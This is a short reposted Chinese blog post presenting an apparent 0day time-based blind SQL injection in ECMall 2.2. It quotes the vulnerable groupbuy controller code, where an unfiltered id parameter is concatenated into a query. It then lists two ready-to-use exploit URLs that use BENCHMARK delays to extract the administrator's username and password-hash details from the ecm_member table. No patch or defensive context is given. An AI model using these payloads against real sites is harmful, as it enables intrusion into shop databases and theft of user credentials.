【转载】ECMall 2.2延迟注射0day

ECMall 2.2延迟注射0day

    function index()
    {
        $id = empty($_GET['id']) ? 0 : $_GET['id'];  //id未过滤
        if (!$id)
        {
            $this->show_warning('no_such_groupbuy');
            return false;
        }
        // 团购信息
        $group = $this->_groupbuy_mod->get(array(
            'conditions' => 'group_id=' . $id . ' AND gb.state<>' . GROUP_PENDING,   //好的，进去了！！
            'join' => 'belong_store',
            'fields' => 'gb.*,s.owner_name'
        ));

        if (empty($group))    //很多时候根本没有团购信息，所以是延迟注射了
        {
            $this->show_warning('no_such_groupbuy');
            return;
        }

exp by k4shifz：

/index.php?app=groupbuy&act=index&id=2 and if((select ascii(mid(user_name,1,1)) from ecm_member where user_id=1)=97,Benchmark(3000000,md5(1)),1)%23
/index.php?app=groupbuy&act=index&id=2%20and%20if((select%20length(password)%20from%20ecm_member%20where%20user_id=1)=32,benchmark(1000000,md5(1)),1)--